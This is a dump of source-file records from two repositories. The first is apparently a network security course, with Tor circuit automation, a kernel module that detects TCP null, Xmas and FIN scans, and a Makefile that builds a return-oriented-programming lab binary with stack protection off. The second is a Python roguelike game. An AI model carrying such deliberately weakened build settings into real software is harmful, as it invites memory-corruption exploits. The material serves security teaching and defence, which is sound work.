"text": "#!/bin/sh\nip link set dev enp0s8 up\nip addr add 10.0.0.1/24 dev enp0s8 \n#ip route add 10.0.0.0/24 via 10.0.0.1 dev enp0s8\n#ip route add 10.0.1.0/24 via 10.0.0.1 dev enp0s8\nroute add -net 10.0.1.0 netmask 255.255.255.0 gw 10.0.0.2\nroute add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1\n#route add default gw 10.0.0.1\n"
},
{
"alpha_fraction": 0.6568293571472168,
"alphanum_fraction": 0.67234206199646,
"avg_line_length": 27.7391300201416,
"blob_id": "237c93f244c3638963b7649cd4f60d1e1fc3657c",
"content_id": "4d479923cbde5a9decfd8fd9231551ce3039dd79",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2643,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 92,
"path": "/Exercise_4/Part1/automate_tor.py",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "# https://stem.torproject.org/tutorials/to_russia_with_love.html\n# https://stackoverflow.com/questions/2473655/how-to-make-a-call-to-an-executable-from-python-script\nfrom stem.control import Controller\nimport stem\nimport stem.process\nimport getpass\nimport subprocess\nfrom os import system\nfrom stem.util import term\nimport os\nFILEPATH = \"/tmp/relay_fingerprints.txt\"\nPROG = \"gedit\"\n#https://metrics.torproject.org/rs.html#toprelays\nEXIT_FINGERPRINT = '18EAE30A4585BEB0D63D36BCFE3F9CA786CB55C7'\n\ndef clear():\n\tclear = lambda: system('clear')\n\n# from https://stem.torproject.org/tutorials/to_russia_with_love.html\ndef print_bootstrap_lines(line):\n if \"Bootstrapped \" in line:\n print(term.format(line, term.Color.BLUE))\n\n\nif __name__ == '__main__':\n\ttry: \n\t\twith Controller.from_port() as controller:\n\t\t\tauth_err=0\n\t\t\ttry:\n\t\t\t\tprint(\"pass: tor\")\n\t\t\t\tps=getpass.getpass(\"Controller password: \")\n\t\t\t\tcontroller.authenticate(password=ps)\n\t\t\texcept:\n\t\t\t\tprint(\"Cannot authenticate controller!\")\n\t\t\t\tauth_err=1\n\t\t\t\n\t\t\tif not auth_err:\n\n\t\t\t\t# print(\"Tor is running version %s\" % controller.get_version())\n\n\t\t\t\t# bytes_read = int(controller.get_info(\"traffic/read\"))\n\t\t\t\t# bytes_written = int(controller.get_info(\"traffic/written\"))\n\n\t\t\t\t# print(\"My Tor relay has read %s Mbytes and written %s.\" % (str(bytes_read/((1024**2))), str(bytes_written/(1024**2))))\n\n\t\t\t\tprint(\"::Creating temp file\")\n\t\t\t\ttry:\n\t\t\t\t\tf = open(FILEPATH, \"w\")\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"ERROR::cannot create file\")\n\n\t\t\t\tprint(\"::Writing relay fingerprints\")\n\t\t\t\ttry:\n\t\t\t\t\trelay_fingerprints = [desc.fingerprint for desc in controller.get_network_statuses()]\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"ERROR::cannot get network statuses, check internet\")\n\n\t\t\t\tfor fingerprints in relay_fingerprints:\n\t\t\t\t\tf.write(fingerprints)\n\t\t\t\t\tf.write(\"\\n\")\n\t\t\t\tf.close()\n\n\t\t\t\targs= (PROG , FILEPATH)\n\t\t\t\tpopen = subprocess.Popen(args, stdout=subprocess.PIPE)\n\n\t\t\t\tclear()\n\t\t\t\tlength=int(input(\"Enter relay size(exluding the exit point: \")) \n\t\t\t\tstream=[]\n\t\t\t\tfor _r in range(length):\n\t\t\t\t\t_s=input(\"relay \"+str(_r+1)+\":\")\n\t\t\t\t\tstream.append(_s)\n\t\t\t\tstream.append(EXIT_FINGERPRINT)\n\n\t\t\t\tprint(\"::Creating circuit\")\n\n\t\t\t\tcircuit_id = controller.new_circuit(stream, await_build = True)\n\n\t\t\t\tinput(\"press enter to exit...\")\n\t\t\t\tprint(\"::Deleting temp fingerprint file\")\n\t\t\t\tos.remove(FILEPATH)\n\n\t\t\t\tch=input(\"Do you want to kill tor? (y/n)\")\n\t\t\t\tif(ch=='y' or ch=='Y'):\n\t\t\t\t\tprint(\"::Killing tor\")\n\t\t\t\t\targs= (\"systemctl\" , \"stop\", \"tor\")\n\t\t\t\t\tpopen = subprocess.Popen(args, stdout=subprocess.PIPE)\n\n\texcept stem.SocketError as er:\n\t\tprint(\"Error: \", er, \"\\nTry starting tor service.\")\n\n\t# finally:\n\t\t# tor_p.kill()"
},
{
"alpha_fraction": 0.6226415038108826,
"alphanum_fraction": 0.7358490824699402,
"avg_line_length": 16.33333396911621,
"blob_id": "3755f1470c0114db921226ed1ad53edc1ca3ce42",
"content_id": "63bd114267010263d064c22fbd56a99cfe31559f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 3,
"path": "/Exercise_1/VM_Files/VM1/start-network",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\nip link set dev enp0s17 up\ndhcpcd enp0s17 \n"
},
{
"alpha_fraction": 0.6422685384750366,
"alphanum_fraction": 0.6446921825408936,
"avg_line_length": 26.891891479492188,
"blob_id": "9f9db01cb411e936f722a772a234aff6ff885b3a",
"content_id": "e6075ad91205062ce228cb3f3ec5c7e90265edd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 2063,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 74,
"path": "/Assignment_1/module/my_net_module.c",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#include <linux/init.h>\n#include <linux/module.h>\n#include <linux/kernel.h>\n#include <linux/netfilter.h>\n#include <linux/netfilter_ipv4.h>\n#include <linux/ip.h>\n#include <linux/tcp.h>\n#include <net/netfilter/nf_conntrack.h>\n\nMODULE_LICENSE(\"GPL\");\nMODULE_AUTHOR(\"Manavjeet Singh\");\nMODULE_DESCRIPTION(\"A netfilter hook module.\");\nMODULE_VERSION(\"1.0\");\n\nstatic struct nf_hook_ops *my_nf_hook = NULL;\n\nstatic unsigned int hook_pre_route(void *priv, struct sk_buff *skb, const struct nf_hook_state *state) {\n\tstruct iphdr *iph;\n\tstruct tcphdr *tcph;\n\tif (!skb)\n\t\treturn NF_ACCEPT;\n\n\tiph = ip_hdr(skb);\n\tif (iph->protocol == IPPROTO_TCP) {\n\t\ttcph=tcp_hdr(skb);\n\n\t\tif (!tcph->syn && !tcph->rst && !tcph->psh && !tcph->ack && !tcph->urg && !tcph->ece && !tcph->cwr && !tcph->fin) {\n\t\t\tprintk(KERN_INFO \"TCP null scan packet detected\\n\");\n\t\t\t// return NF_DROP;\n\t\t}\n\t\telse if(!tcph->syn && !tcph->rst && tcph->psh && !tcph->ack && tcph->urg && !tcph->ece && !tcph->cwr && tcph->fin){\n\t\t\tprintk(KERN_INFO \"Xmas scan detected\\n\");\n\t\t\t// return NF_DROP;\n\n\t\t}\n\t\telse if(!tcph->syn && !tcph->rst && !tcph->psh && !tcph->ack && !tcph->urg && !tcph->ece && !tcph->cwr && tcph->fin){\n\t\t\tprintk(KERN_INFO \"Fin scan detected\\n\");\n\t\t\t// return NF_DROP;\n\t\t}\n\n\t}\n\n\t\n\treturn NF_ACCEPT;\n}\n\n\nstatic int __init my_net_module_init(void) {\n\tprintk(KERN_INFO \"Initializing my netfilter module\\n\");\n\n\t/*Hook for which connection tracking is not required*/\n\tmy_nf_hook = (struct nf_hook_ops*) kzalloc(sizeof(struct nf_hook_ops), GFP_KERNEL);\n\n\tmy_nf_hook->hook \t\t\t= (nf_hookfn*)hook_pre_route;\t/* hook function */\n\tmy_nf_hook->hooknum \t\t= NF_INET_PRE_ROUTING;\t\t\t/* received packets */\n\tmy_nf_hook->pf \t\t\t\t= PF_INET;\t\t\t\t\t\t/* IPv4 */\n\tmy_nf_hook->priority \t\t= NF_IP_PRI_FIRST;\t\t\t\t/* max hook priority */\n\n\tnf_register_net_hook(&init_net, my_nf_hook);\n\n\n\n\treturn 0;\n}\n\nstatic void __exit my_net_module_exit(void) {\n\n\tnf_unregister_net_hook(&init_net, my_nf_hook);\n\tkfree(my_nf_hook);\n\tprintk(KERN_INFO \"Exiting my netfilter module\\n\");\n}\n\nmodule_init(my_net_module_init);\nmodule_exit(my_net_module_exit);"
},
{
"alpha_fraction": 0.6692913174629211,
"alphanum_fraction": 0.7007874250411987,
"avg_line_length": 24.600000381469727,
"blob_id": "2d74cc7fbaeeceec62bd3e1955951211d572fbd5",
"content_id": "3b476031e964b93966899c79dd9086fda9b0d79d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 127,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 5,
"path": "/Assignment_2/return_oriented_programming/Makefile",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "sample:\n\tgcc sample.c -o buffover -fno-stack-protector -w -m32 -g\n\nbonus:\n\tgcc bonus.c -o write -fno-stack-protector -w -m32 -g"
},
{
"alpha_fraction": 0.6747967600822449,
"alphanum_fraction": 0.6747967600822449,
"avg_line_length": 17.846153259277344,
"blob_id": "274830896199e8bf2aaca7cfdc30cceb6576a500",
"content_id": "c7dd699cabbfdddeb28316784b99d278d2c0af03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 246,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 13,
"path": "/Assignment_1/Submission/Makefile",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "obj-m += my_net_module.o\n\nall:\n\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules\n\ninsert: all\n\tsudo insmod my_net_module.ko\n\nremove: \n\tsudo rmmod my_net_module.ko\n\nclean:\n\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean\n\n"
}
] | 18 |
dustinrohde/nomad
|
https://github.com/dustinrohde/nomad
|
7385ca7faaa6395b9690ba9cabc8d732d07e8d98
|
cd2e8bf88d3d77f350dff38818fff9df0ebb5211
|
fe75bb7194d21056bd9a8c5ba40b63dd3b93e7a3
|
refs/heads/master
| 2021-01-19T12:32:44.189442 | 2016-01-08T22:09:44 | 2016-01-08T22:09:44 | 4,158,439 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5359833240509033,
"alphanum_fraction": 0.5391889810562134,
"avg_line_length": 31.82631492614746,
"blob_id": "83daaf21510ab06277fa34f96e60212429698ac2",
"content_id": "1aa449c1a7ccea2c494872833328e5ccd998829a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6239,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 190,
"path": "/nomad/plains.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "'''the dynamically generated world in which Nomad takes place'''\nfrom nomad.entity import Entity\nfrom nomad.util import *\n\nclass Plains:\n '''A shifting world that generates itself as it moves.'''\n\n def __init__(self, entities, floor_entity, generate):\n self.entities = entities\n self.floor_entity = floor_entity\n self.generate = generate\n\n self._init_entities(self.entities)\n\n @classmethod\n def with_floor(cls, floor_entity, generate, *shape_args, **shape_kws):\n shape_kws['default'] = lambda: [floor_entity()] \n return cls(Octagon(*shape_args, **shape_kws),\n floor_entity, generate)\n\n @staticmethod\n def _iter_entities(entities):\n for (x, y), ents in entities.items():\n for z, e in enumerate(ents):\n yield (x, y, z), e\n\n def _inform_entity(self, entity, x, y, z):\n '''Inform an entity of its xy positon.'''\n assert self.entities.in_bounds(x, y)\n entity.x = x\n entity.y = y \n entity.z = z\n\n def _inform_entities(self, entities):\n '''Inform many entities of their xy positions.'''\n for point, entity in self._iter_entities(entities):\n self._inform_entity(entity, *point)\n\n def _init_entity(self, entity, x, y, z):\n entity.plains = self\n self._inform_entity(entity, x, y, z)\n\n def _init_entities(self, entities):\n for (x, y, z), e in self._iter_entities(entities):\n self._init_entity(e, x, y, z)\n\n def walkable_at(self, x, y):\n '''Are all entities walkable at point (x, y)?'''\n xy = (x, y)\n return (xy in self.entities and\n all(e.walkable for e in self.entities[xy]))\n\n def get_entity(self, x, y, z=-1):\n '''Return the entity at the given coordinates on this plains.'''\n return self.entities[(x, y)][z]\n\n def get_entities(self):\n '''Yield each entity on this plains in an arbitrary order.'''\n for ents in self.entities.values():\n for ent in ents:\n yield ent\n\n def get_coords(self):\n '''Yield an x, y, z triplet for each coordinate on this plains.'''\n for (x, y), ents in self.entities.items():\n for z in range(len(ents)):\n yield x, y, z\n\n def z_in_bounds(self, x, y, z):\n '''Does an entity exist at (x, y, z)?'''\n return 0 <= z < len(self.entities[(x, y)])\n \n def add_entity(self, entity, x, y, z=-1):\n '''Add an entity at the given x, y, z. If z is -1, append it to\n the top.\n '''\n entities = self.entities[(x, y)]\n\n # If z is -1, append entity to the top.\n if z == -1:\n entities.append(entity)\n z = len(entities) - 1\n # Else, if z is in bounds, insert entity at z.\n elif self.z_in_bounds(x, y, z):\n entities.insert(z, entity)\n # Update z coords of above entities.\n for entity in entities[z:]:\n entity.z += 1\n # Otherwise, terminate.\n else:\n return\n # Initialize the entity at its new position.\n self._init_entity(entity, x, y, z)\n\n def pop_entity(self, x, y, z=-1):\n '''Remove and return the entity at the given x, y, z. 
If z is -1,\n pop the topmost entity.\n '''\n return self.entities[(x, y)].pop(z)\n\n def remove_entity(self, entity):\n entities = self.entities[entity.pos]\n z = entity.z\n # Delete the entity at its x, y, z position.\n del entities[z]\n # Update z coords of above entities.\n for entity in entities[z:]:\n entity.z -= 1\n\n def move_entity(self, entity, x, y, z=-1):\n '''Remove the entity at (x1, y1, z1) and add it to (x2, y2, z2).'''\n self.remove_entity(entity)\n self.add_entity(entity, x, y, z)\n\n def shift(self, dx, dy):\n assert dx or dy\n gen_coords = set()\n\n # Shift all entities by (dx, dy).\n entities = Octagon(*self.entities.params)\n for (x, y), ents in self.entities.items():\n new_point = Point(x + dx, y + dy)\n # Only move entity if new point is in bounds.\n if self.entities.in_bounds(*new_point):\n entities[new_point] = ents\n else:\n gen_coords.add(Point(-x, -y))\n\n # Generate new entities to fill open edge.\n new_entities = self.generate(self, gen_coords)\n self._init_entities(new_entities)\n self._inform_entities(entities)\n entities.update(new_entities)\n self.entities = entities\n\n\nclass Octagon(dict):\n '''A mapping of (x, y) tuples to arbitrary values. The coordinates\n form an octagon.\n\n `Properties`\n `up` : int\n Lower y boundary.\n `down` : int\n Upper y boundary.\n `left` : int\n Lower x boundary.\n `right` : int\n Upper x boundary.\n `ul` : `Point`\n Upper Left diagonal boundary.\n `ur` : `Point`\n Upper Right diagonal boundary.\n `lr` : `Point`\n Lower Right diagonal boundary.\n `ll` : `Point`\n Lower Left diagonal boundary.\n '''\n\n def __init__(self, up, right, down, left, ul, ur, lr, ll,\n default=lambda: None):\n self.up = up\n self.right = right\n self.down = down\n self.left = left\n self.ul = ul\n self.ur = ur \n self.lr = lr\n self.ll = ll\n self.default = default\n\n self.params = (up, right, down, left, ul, ur, lr, ll, default)\n\n for y in range(self.up, self.down + 1):\n for x in range(self.left, self.right + 1):\n if self.in_bounds(x, y):\n self[Point(x, y)] = default()\n\n def in_bounds(self, x, y):\n if x < self.left: return False\n if x > self.right: return False\n if y < self.up: return False\n if y > self.down: return False\n\n if x - self.ul.x < self.ul.y - y: return False\n if x - self.ur.x < y - self.ur.y: return False\n if x - self.ll.x > y - self.ll.y: return False\n if x - self.lr.x > self.lr.y - y: return False\n\n return True\n\n\n"
},
{
"alpha_fraction": 0.5649546980857849,
"alphanum_fraction": 0.5709969997406006,
"avg_line_length": 28.205883026123047,
"blob_id": "457c487036c7d754419dbb717533d254c04158b0",
"content_id": "5ca59c0f263c55e0bd5e015eb028ad7d7048acde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 993,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 34,
"path": "/nomad/plainsgen.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "'''algorithms for dynamic generation of the plains'''\nimport random as rand\n\nfrom nomad.util import *\n\ndef background():\n def generate(plains, edge_coords):\n return dict((xy, [plains.floor_entity()]) for xy in edge_coords)\n return generate\n\n\ndef random(*entities):\n def generate(plains, edge_coords):\n new_ents = {}\n for xy in edge_coords:\n new_ents[xy] = [plains.floor_entity(), rand.choice(entities)()]\n return new_ents\n return generate\n\n\ndef chance(prob2ent):\n probs = sorted(prob2ent.keys(), key=lambda x: x + rand.random())\n def generate(plains, edge_coords):\n new_ents = {}\n for xy in edge_coords:\n new_ents[xy] = [plains.floor_entity()]\n roll = rand.random()\n for prob in probs:\n if roll * 100 <= prob:\n entity = prob2ent[prob]\n new_ents[xy].append(entity())\n break\n return new_ents\n return generate\n"
},
{
"alpha_fraction": 0.5888985395431519,
"alphanum_fraction": 0.6053772568702698,
"avg_line_length": 24.065217971801758,
"blob_id": "0676cf77ffb75fc7d845f79319f54d3d109c1fed",
"content_id": "9ffe1c30efafbc37b19feca9b59f76ad53d54247",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1153,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 46,
"path": "/nomad/entities.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "'''entity definitions'''\nimport random\n\nfrom nomad.entity import Entity\nfrom nomad.roles import *\nfrom nomad.util import DIRECTIONS\n\ndef shuffle(actor, nomad):\n dx, dy = random.choice(DIRECTIONS)\n actor.move(dx, dy)\n\ndef strike(tool, actor, target):\n target.damage(tool.as_matter.weight)\n\n\ndef earth(): return Entity(\n 'earth', True, False)\ndef rock(): return Entity(\n 'rock', False)\n\ndef grass(): return Entity(\n 'grass', True, roles={\n 'edible': Edible(0, -5)})\ndef flower(): return Entity(\n 'flower', True, roles={\n 'edible': Edible(0, -1)}) \ndef mushroom(): return Entity(\n 'mushroom', True, roles={\n 'edible': Edible(10, 1)})\n\ndef stick(): return Entity(\n 'stick', True, roles={\n 'matter': Matter(25, 25),\n 'usable': Usable(strike)})\ndef sharp_rock(): return Entity(\n 'sharp rock', True, roles={\n 'matter': Matter(25, 25),\n 'usable': Usable(strike)})\ndef spear(): return Entity(\n 'spear', True, roles={\n 'matter': Matter(25, 25),\n 'usable': Usable(strike)})\n\ndef yak(): return Entity(\n 'yak', False, False, roles={\n 'actor': Actor(shuffle)})\n"
},
{
"alpha_fraction": 0.5983379483222961,
"alphanum_fraction": 0.5983379483222961,
"avg_line_length": 29.08333396911621,
"blob_id": "eeeeeb63bdbd2ea8c1d2d3b881abb191a010376b",
"content_id": "37ce7c905b090f7d76dc82465ac6534277cf5aaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1083,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 36,
"path": "/TODO.rst",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "N O M A D <> T O D O\n-------------------------------------------------\n\nTidy up.\n^^^^^^^^^\n\n #) Fix Plains.shift so that it creates a perfectly symmetrical\n octogon.\n\n\nImplement weapons.\n^^^^^^^^^^^^^^^^^^\n\n #) Implement death for mortals and mulching for usable objects.\n\n #) Implement different mechanics for fleshy creatures and objects.\n Perhaps use the Matter role for this.\n\n\nImplement hunting.\n^^^^^^^^^^^^^^^^^^\n\n #) Implement corpses.\n When a fauna is killed, its corpse is left behind.\n A corpse can be cut while standing over it and wielding a sharp\n edge.\n\n #) Implement meat, hides and bones.\n When a corpse is cut, a stack of meat, hides and bones is left.\n Meat has high satiation. Hides can be used to make clothing and\n bags. Bones can be used to make a sharp edge.\n\n #) Write ``Mortal.throw`` method.\n Throws a held entity at a given target. Power and speed are\n determined by STR, and accuracy by AGL.\n Target selection mirrors Stone Soup's approach.\n"
},
{
"alpha_fraction": 0.5822434425354004,
"alphanum_fraction": 0.5860901474952698,
"avg_line_length": 27.256521224975586,
"blob_id": "96b066b92c055d28c1069df62677d5414b9fb6e6",
"content_id": "8c550fe0ec1e53c13b19ded3397f0ed0cf462a2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6499,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 230,
"path": "/nomad/roles.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "'''entity behaviors'''\nfrom collections import OrderedDict\n\nclass Role:\n '''Abstract class for `Entity` behaviors.'''\n\n def __init__(self):\n self.entity = None\n\n def assign(self, entity):\n '''Assign this role to an entity.'''\n self.entity = entity\n\n def __getattr__(self, *args, **kwargs):\n '''If an attribute is not found on the role, search its entity.\n\n A role must be assigned with `Role.assign` before this will work.\n '''\n return getattr(self.entity, *args, **kwargs)\n\n def update(self, nomad):\n '''Update the entity assigned to this role, given a `Nomad`.\n \n This method is called each turn of the game.\n '''\n pass\n \n def damage(self, dmg):\n '''Cause damage to the entity assigned to this role.\n \n Return True if damage was dealt, else False.\n '''\n return False\n\n\nclass Matter(Role):\n '''Something with physical properties.'''\n\n def __init__(self, weight, edge):\n self.weight = weight\n self.edge = edge\n\n\nclass Edible(Role):\n '''Something that can be eaten, for good or ill.'''\n\n def __init__(self, satiation, nutrition):\n super().__init__()\n self.satiation = satiation\n self.nutrition = nutrition\n\n\nclass Usable(Role):\n '''Something that can be \"used\" on another Entity.'''\n\n def __init__(self, on_use):\n super().__init__()\n self.on_use = on_use\n\n def use_on(self, entity):\n '''Use the usable on another entity.'''\n self.on_use(self, entity)\n\n\nclass Weapon(Role):\n '''A tool for killing.'''\n\n def __init__(self, damage, accuracy, nhits):\n self.damage = damage\n self.accuracy = accuracy\n self.nhits = nhits\n\n def use_on(self, entity):\n for i in range(self.nhits):\n if random() * 100 > self.accuracy:\n continue\n entity.damage(self.damage)\n\n\nclass Actor(Role):\n '''Something that acts each turn.'''\n\n def __init__(self, action):\n super().__init__()\n self.action = action\n\n def update(self, nomad):\n '''Perform an action.'''\n self.action(self.entity, nomad)\n\n\nclass Reactor(Role):\n '''Something that reacts when engaged with.'''\n\n def __init__(self, action):\n super().__init__()\n self.action = action\n\n def react_to(self, entity):\n '''Perform an action in response to an Entity.'''\n self.action(self.entity, entity)\n\n\nclass Mortal(Role):\n '''Something that can die and requires sustainance to stay alive.'''\n\n MIN_SATIATION = 0\n MAX_SATIATION = 100\n MIN_HEALTH = 0\n MAX_HEALTH = 100\n\n SATIATION_DECAY = 0.25\n\n def __init__(self, satiation=MAX_SATIATION, health=MAX_HEALTH):\n super().__init__()\n self._satiation = satiation\n self._health = health\n\n def update(self, nomad):\n '''Reduce satiation by a fixed amount.'''\n self.satiation -= self.SATIATION_DECAY\n\n def damage(self, dmg):\n if not self.health:\n return False\n self.health -= dmg\n return True\n\n @property\n def alive(self):\n '''Is the mortal alive?'''\n return self.satiation > 0\n\n def _get_satiation(self):\n return self._satiation\n def _set_satiation(self, x):\n self._satiation = max(self.MIN_SATIATION, min(self.MAX_SATIATION, x))\n satiation = property(_get_satiation, _set_satiation, doc=\n 'How full is the mortal? If this reaches 0, death occurs.')\n\n def _get_health(self):\n return self._health\n def _set_health(self, x):\n self._health = max(self.MIN_HEALTH, min(self.MAX_HEALTH, x))\n health = property(_get_health, _set_health, doc=\n 'How healthy is the mortal? If this reaches 0, death occurs.')\n\n def eat(self, entity):\n '''Attempt to eat an entity. 
Return True if successful, else False.'''\n        edible = entity.as_edible\n        if edible:\n            self.satiation = self.satiation + edible.satiation\n            self.health = self.health + edible.nutrition\n            return True\n        return False\n\n    def eat_nearest(self):\n        entity = self.select_in_reach()\n        if entity and self.as_mortal.eat(entity):\n            self.plains.remove_entity(entity)\n\n\nclass Tactile(Role):\n    '''Something that has fine motor control.'''\n\n    def __init__(self, object_factory, left_held=None, right_held=None):\n        super().__init__()\n        self.object_factory = object_factory\n        self.held_entities = [left_held, right_held]\n\n    def assign(self, entity):\n        super().assign(entity)\n\n    def eat_nearest(self):\n        for i, entity in enumerate(self.held_entities):\n            if entity and self.as_mortal.eat(entity):\n                self.held_entities[i] = None\n                return\n        self.as_mortal.eat_nearest()\n\n    def pickup_nearest(self):\n        # Get closest entity in reach.\n        entity = self.select_in_reach()\n\n        # Quit if entity unmoveable.\n        if not entity or not entity.moveable:\n            return\n\n        # Put entity in a free hand, or quit if there isn't one.\n        if self.held_entities[0] is None:\n            self.held_entities[0] = entity\n        elif self.held_entities[1] is None:\n            self.held_entities[1] = entity\n        else:\n            return\n\n        # Remove the entity from the plains.\n        self.plains.remove_entity(entity)\n\n    def drop_left(self):\n        '''Drop the entity in the tactile's left hand underfoot.'''\n        self.put_underfoot(self.held_entities[0])\n        self.held_entities[0] = None\n\n    def drop_right(self):\n        '''Drop the entity in the tactile's right hand underfoot.'''\n        self.put_underfoot(self.held_entities[1])\n        self.held_entities[1] = None\n\n    def drop_all(self):\n        '''Drop all entities held by the tactile.'''\n        self.drop_left()\n        self.drop_right()\n\n    def combine_objects(self):\n        '''Attempt to make a usable with the entities on hand.'''\n        parts = frozenset(part.name for part in self.held_entities if part)\n\n        if parts not in self.object_factory:\n            return\n\n        min_intelligence, usable = self.object_factory[parts]\n        if self.stats.intelligence < min_intelligence:\n            return\n\n        # name is a plain attribute, not a method; guard against an empty hand\n        for i, part in enumerate(self.held_entities):\n            if part and part.name in parts:\n                self.held_entities[i] = None\n\n        self.put_underfoot(usable())\n"
},
{
"alpha_fraction": 0.5519005656242371,
"alphanum_fraction": 0.5789473652839661,
"avg_line_length": 26.918367385864258,
"blob_id": "aa24670b0bd1b6b3c11ef7f771acbab47e7d8675",
"content_id": "4b0f6231e9f0dd639ec9f1177c833b13c4c4ee1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1368,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 49,
"path": "/nomad/util.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "import math\nfrom collections import namedtuple\n\nDIR_UP = (0, -1)\nDIR_DOWN = (0, 1)\nDIR_LEFT = (-1, 0)\nDIR_RIGHT = (1, 0)\nDIR_UPLEFT = (-1, -1)\nDIR_UPRIGHT = (1, -1)\nDIR_DOWNLEFT = (-1, 1)\nDIR_DOWNRIGHT = (1, 1)\nDIRECTIONS = (DIR_UP, DIR_DOWN, DIR_LEFT, DIR_RIGHT,\n DIR_UPLEFT, DIR_UPRIGHT, DIR_DOWNLEFT, DIR_DOWNRIGHT)\n\nPoint = namedtuple('Point', 'x y')\n\ndef edge_coord(origin, radius, trig_func, degrees):\n return origin + radius * trig_func(degrees * math.pi / 180) \n\ndef edge_point(origin_x, origin_y, radius, degrees):\n return (edge_coord(origin_x, radius, math.cos, degrees),\n edge_coord(origin_y, radius, math.sin, degrees))\n\n\ndef points_in_circle(radius):\n for y in range(-radius, radius):\n for x in range(-radius, radius):\n if distance(0, 0, x, y) < radius:\n yield Point(x, y)\n\n\ndef points_in_octagon(side):\n points = set()\n size = side * 3\n half_size = size // 2\n half_side = side // 2\n for y in range(-half_size - 1, half_size + 1):\n x1 = -half_side - (side - abs(y))\n x2 = half_side + (side - abs(y)) + 1\n for x in range(x1, x2):\n points.add((x, y))\n return points\n\n\ndef distance(x, y, x2, y2):\n return math.sqrt(((x2 - x) ** 2) + ((y2 - y) ** 2))\n\ndef flatten_keys(d):\n return dict((key, v) for keys, v in d.items() for key in keys)\n"
},
{
"alpha_fraction": 0.5472432971000671,
"alphanum_fraction": 0.5546218752861023,
"avg_line_length": 28.93251609802246,
"blob_id": "c6075350964fcb6b24e1782aa37b251af436194a",
"content_id": "897c9b33ba2802c24bd5236514e11336945615a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4879,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 163,
"path": "/nomad/game.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "'''run the game'''\nimport curses\nfrom curses import KEY_LEFT, KEY_RIGHT, KEY_UP, KEY_DOWN\nfrom functools import partial\n\nfrom nomad.entities import *\nfrom nomad import interface\nfrom nomad.interface import *\nfrom nomad.nomad import Nomad\nfrom nomad.plains import Plains\nimport nomad.plainsgen as gen\nfrom nomad.util import *\n\n# Subwindow dimensions as (height, width, y, x)\nPLAINS_WIN = (21, 21, 1, 1)\nSTATUS_WIN = (21, 21, 0, 22)\n\n\ndef run():\n '''Initialize curses and call `main`.'''\n stdscr = curses.initscr()\n curses.start_color()\n curses.use_default_colors()\n curses.curs_set(0)\n curses.wrapper(main)\n curses.curs_set(1)\n\n\ndef main(stdscr): \n '''Run the game, given a curses ``stdscr``.'''\n init_color_pairs()\n\n # Define the nomad.\n nomad = Nomad(los=6)\n # Define the plains.\n los = nomad.los\n half_los = los // 2 + 1\n plains = Plains.with_floor(earth,\n gen.chance(\n {90: grass, 10: flower,\n 3: mushroom, 5: stick,\n 2: sharp_rock, 1: yak}),\n up=-los, left=-los, right=los, down=los,\n ul=Point(-half_los, -half_los),\n ur=Point(-half_los, half_los),\n lr=Point(half_los, half_los),\n ll=Point(half_los, -half_los),)\n # Add nomad to plains.\n plains.add_entity(nomad, 0, 0)\n\n # Make windows.\n plains_win = curses.newwin(*PLAINS_WIN) \n status_win = curses.newwin(*STATUS_WIN)\n # Get rendering data.\n display_dict = render_info()\n # Get keybindings.\n command_dict = player_commands()\n # Initialize user interface.\n interface.ui = interface.Interface(stdscr, plains_win, status_win,\n nomad, display_dict, command_dict)\n\n # Execute the main loop while the nomad lives.\n while nomad.as_mortal.alive:\n # Update the screen.\n interface.ui.update_plains_window()\n interface.ui.update_status_window()\n\n # Get and handle user input.\n interface.ui.interact()\n\n # Update all 